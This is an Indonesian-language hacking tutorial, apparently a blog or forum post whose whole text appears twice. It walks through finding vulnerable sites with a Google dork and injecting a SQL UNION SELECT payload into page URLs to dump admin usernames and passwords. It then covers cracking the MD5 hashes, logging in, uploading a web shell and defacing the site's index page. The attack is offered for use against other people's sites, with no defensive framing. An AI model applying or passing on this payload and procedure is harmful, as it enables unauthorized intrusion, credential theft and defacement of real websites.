Welkambek
Gosah banyak bacot gan
Dork : inurl:statis--profil.html
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Caranya:
- dorking di gugel
- masukin exploit sebelum html
(Contoh: target.co.li/99.html jadi target.co.li/99'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+.html)
- kalo udah buka view source (pc: CTRL+U. hp: view-source:target.co.li/exploitnya)
- dapet user&pass admin
- hash dulu passwordnya
(Buat hash cari aja di google dengan keyword "Hash md5")
- kalo udah cari admin loginnya (biasanya di admin,administrator/login.php,login)
- cari buat upload
- upload shell lo
- kalo udah open new tab fotonya
- boom
Note: kalo mau tebas index budayakan backup indexnya.. thanks
-azay gans
Gosah banyak bacot gan
Dork : inurl:statis--profil.html
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Caranya:
- dorking di gugel
- masukin exploit sebelum html
(Contoh: target.co.li/99.html jadi target.co.li/99'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+.html)
- kalo udah buka view source (pc: CTRL+U. hp: view-source:target.co.li/exploitnya)
- dapet user&pass admin
- hash dulu passwordnya
(Buat hash cari aja di google dengan keyword "Hash md5")
- kalo udah cari admin loginnya (biasanya di admin,administrator/login.php,login)
- cari buat upload
- upload shell lo
- kalo udah open new tab fotonya
- boom
Note: kalo mau tebas index budayakan backup indexnya.. thanks
-azay gans